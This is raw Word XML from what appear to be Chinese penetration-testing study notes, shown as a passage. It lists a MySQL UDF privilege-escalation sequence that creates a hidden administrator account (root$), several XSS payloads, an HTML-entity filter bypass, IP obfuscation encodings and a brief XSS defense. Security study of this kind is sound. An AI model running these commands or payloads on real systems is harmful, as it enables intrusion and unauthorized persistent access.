      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>df</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32AA8" w:rsidRDefault="0010761B" w:rsidP="006250EF">
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> function cmdshell returns string soname </w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>udf.dll</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32AA8" w:rsidRDefault="0010761B" w:rsidP="006250EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elect cmdshell(</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net user root$ 5201314 /add</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32AA8" w:rsidRDefault="0010761B" w:rsidP="006250EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elect cmdshell(</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net localgroup administrators root$ /add</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32AA8" w:rsidRPr="00DB41CA" w:rsidRDefault="0010761B" w:rsidP="006250EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elect cmdshell(</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net user root$</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00F32AA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00494E25" w:rsidRDefault="00494E25" w:rsidP="00CC7B26">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A71C79" w:rsidRDefault="00A71C79" w:rsidP="00CC7B26">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E7917" w:rsidRDefault="005E7917" w:rsidP="00CC7B26">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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7917" w:rsidRPr="005E7917" w:rsidRDefault="005E7917" w:rsidP="005E7917">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc468296494"/>
      <w:r w:rsidRPr="005E7917">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="005C172D" w:rsidRDefault="005C172D" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB5B37" w:rsidRDefault="00FB2ECB" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;script&gt;prompt(/xp/)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB5B37" w:rsidRDefault="00CB5B37" w:rsidP="00CB5B37"/>
    <w:p w:rsidR="002D558A" w:rsidRDefault="002D558A" w:rsidP="00CB5B37"/>
    <w:p w:rsidR="003F0B43" w:rsidRDefault="003F0B43" w:rsidP="00CB5B37"/>
    <w:p w:rsidR="0018715B" w:rsidRDefault="00CB5B37" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片跨站</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018715B" w:rsidRDefault="0018715B" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018715B" w:rsidRDefault="0018715B" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>url = request(</w:t>
      </w:r>
      <w:r>
        <w:t>“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);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018715B" w:rsidRDefault="0018715B" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006605EA" w:rsidRDefault="0018715B" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;% =</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;img src=</w:t>
      </w:r>
      <w:r>
        <w:t>’”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; url &amp; </w:t>
      </w:r>
      <w:r>
        <w:t>“’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 xml:space="preserve"> %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00356649" w:rsidRDefault="00356649" w:rsidP="00CB5B37"/>
    <w:p w:rsidR="002D558A" w:rsidRDefault="002D558A" w:rsidP="00CB5B37"/>
    <w:p w:rsidR="002D558A" w:rsidRDefault="002D558A" w:rsidP="00CB5B37"/>
    <w:p w:rsidR="00DC0E2E" w:rsidRDefault="00DC0E2E" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站姿势</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0E2E" w:rsidRDefault="00DC0E2E" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0E2E" w:rsidRDefault="00DC0E2E" w:rsidP="00CB5B37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">onerror= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2285" w:rsidRDefault="00DC0E2E" w:rsidP="00781CCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>onblur=(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失去焦点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2285" w:rsidRDefault="003D2285" w:rsidP="00781CCA"/>
    <w:p w:rsidR="00563B1C" w:rsidRDefault="00563B1C" w:rsidP="00781CCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要特别注意代码所在语境，有语境才有语义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004127F8" w:rsidRDefault="004127F8" w:rsidP="00781CCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript:alert(/xss/)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D558A" w:rsidRDefault="002D558A" w:rsidP="00781CCA"/>
    <w:p w:rsidR="004127F8" w:rsidRDefault="004127F8" w:rsidP="00781CCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xss:expression(</w:t>
      </w:r>
      <w:r w:rsidR="00830D07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(/xss/))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004127F8" w:rsidRDefault="004127F8" w:rsidP="00781CCA"/>
    <w:p w:rsidR="004127F8" w:rsidRDefault="004127F8" w:rsidP="00781CCA"/>
    <w:p w:rsidR="002D558A" w:rsidRDefault="002D558A" w:rsidP="00781CCA"/>
    <w:p w:rsidR="003D2285" w:rsidRDefault="00C278D8" w:rsidP="004D004B">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc468296495"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidR="004D004B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="004D004B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CRUD </w:t>
      </w:r>
      <w:r w:rsidR="004D004B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增删改查）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00C6390E" w:rsidRDefault="00C6390E" w:rsidP="00404734">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">javascript:alert(/xss/) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;#116&amp;#58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidR="00F91512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（前提是</w:t>
      </w:r>
      <w:r w:rsidR="00F91512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00F91512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语境，比如</w:t>
      </w:r>
      <w:r w:rsidR="00E56313">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src=javascrip&amp;#116&amp;#58</w:t>
      </w:r>
      <w:r w:rsidR="00F91512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alert(/xss/)</w:t>
      </w:r>
      <w:r w:rsidR="00E661AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F91512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00E661AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2285" w:rsidRDefault="004D4124" w:rsidP="00781CCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2285" w:rsidRDefault="000C364A" w:rsidP="00B55149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AB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4124" w:rsidRDefault="00826EC0" w:rsidP="008B3FD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各种</w:t>
      </w:r>
      <w:r w:rsidR="008B3FD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037418" w:rsidRDefault="00037418" w:rsidP="00037418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URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003819B4" w:rsidRPr="003819B4" w:rsidRDefault="003819B4" w:rsidP="003819B4">
      <w:r w:rsidRPr="00BB5D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://user:password@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip:port?id=1&amp;para=2#anchor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2886" w:rsidRDefault="00876A44" w:rsidP="00037418">
      <w:r w:rsidRPr="00876A44">
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="007A2886">
          <w:t>www.baidu.com</w:t>
        </w:r>
        <w:r w:rsidRPr="007A2886">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>得到百度</w:t>
        </w:r>
        <w:r w:rsidRPr="007A2886">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>IP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址：</w:t>
      </w:r>
      <w:r w:rsidR="004D24C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>119.75.218.70</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00832AD1" w:rsidRDefault="00713C1C" w:rsidP="00037418">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六进制：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x77</w:t>
      </w:r>
      <w:r w:rsidR="00B161D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00211D84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4B</w:t>
      </w:r>
      <w:r w:rsidR="00B161D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DA 46</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713C1C" w:rsidRDefault="00713C1C" w:rsidP="00037418">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>八进制：</w:t>
      </w:r>
      <w:r w:rsidR="00DA3590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="001E07EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>167</w:t>
      </w:r>
      <w:r w:rsidR="00B161D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00211D84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>113</w:t>
      </w:r>
      <w:r w:rsidR="00B161D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 332 106</w:t>
      </w:r>
      <w:r w:rsidR="0007421B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0007421B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（测试未通过）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713C1C" w:rsidRDefault="00713C1C" w:rsidP="00037418">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制：</w:t>
      </w:r>
      <w:r w:rsidR="001E07EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>01110111</w:t>
      </w:r>
      <w:r w:rsidR="00211D84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 01001011 </w:t>
      </w:r>
      <w:r w:rsidR="00B161D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11011010 01000110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713C1C" w:rsidRDefault="00713C1C" w:rsidP="00037418">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十进制：</w:t>
      </w:r>
      <w:r w:rsidR="00120165">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2001459782</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00832AD1" w:rsidRPr="00832AD1" w:rsidRDefault="00832AD1" w:rsidP="00037418"/>
    <w:p w:rsidR="004D4124" w:rsidRDefault="004D4124" w:rsidP="004D4124">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F1BBF" w:rsidRDefault="000F1BBF" w:rsidP="004D4124"/>
    <w:p w:rsidR="000F1BBF" w:rsidRDefault="000F1BBF" w:rsidP="004D4124"/>
    <w:p w:rsidR="000F1BBF" w:rsidRDefault="000F1BBF" w:rsidP="004D4124"/>
    <w:p w:rsidR="000F1BBF" w:rsidRDefault="000F1BBF" w:rsidP="004D4124">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防御：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F1BBF" w:rsidRDefault="000F1BBF" w:rsidP="004D4124">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt; &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidR="004826FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码，可以使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt; &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidR="00CA7B23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面失效：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F1BBF" w:rsidRPr="000F1BBF" w:rsidRDefault="000F1BBF" w:rsidP="004D4124">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">url = replace(url, </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;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&amp;#x3C;</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F1BBF" w:rsidRDefault="000F1BBF" w:rsidP="000F1BBF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">url = replace(url, </w:t>
      </w:r>
      <w:r>
        <w:t>“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&amp;#x3E;</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74FB4" w:rsidRDefault="00D74FB4" w:rsidP="000F1BBF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;img src=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onerror=alert(</w:t>
      </w:r>
      <w:r>
        <w:t>“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>)&amp;#x3E;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3DA8" w:rsidRDefault="00AE3DA8" w:rsidP="000F1BBF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而如果在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语境中时则可绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3DA8" w:rsidRPr="00AE3DA8" w:rsidRDefault="00AE3DA8" w:rsidP="000F1BBF">
      <w:r w:rsidRPr="00AE3DA8">
        <w:t>&lt;im</w:t>
      </w:r>
      <w:r w:rsidR="00195D3D">
        <w:t>g src='1' onerror=alert("123")</w:t>
      </w:r>
      <w:r w:rsidR="00195D3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3DA8">
        <w:t>&amp;#x3E;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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C79" w:rsidRPr="00E9133B" w:rsidRDefault="00A71C79" w:rsidP="00A71C79">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc468296496"/>
      <w:r w:rsidRPr="00E9133B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提权</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00A71C79" w:rsidRDefault="00A71C79" w:rsidP="00CC7B26">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A71C79" w:rsidRDefault="00A71C79" w:rsidP="00CC7B26">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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62DE" w:rsidRPr="009026FF" w:rsidRDefault="003A62DE" w:rsidP="009026FF">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc468296497"/>
      <w:r w:rsidRPr="009026FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>内网渗透</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="003A62DE" w:rsidRDefault="009C590E" w:rsidP="0077480F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="357" w:firstLineChars="0" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc468296498"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTSCAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和啊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络工具包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="009C590E" w:rsidRDefault="009C590E" w:rsidP="007B7A0B"/>
    <w:p w:rsidR="003A62DE" w:rsidRDefault="003A62DE" w:rsidP="00CD4823"/>
    <w:p w:rsidR="00E57E3F" w:rsidRDefault="00E57E3F" w:rsidP="00CD4823"/>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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7E3F" w:rsidRDefault="00E57E3F" w:rsidP="00E57E3F">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc468296499"/>
      <w:r w:rsidRPr="00E57E3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>瑞士军刀系列：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00E57E3F" w:rsidRDefault="00E57E3F" w:rsidP="008511FF">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
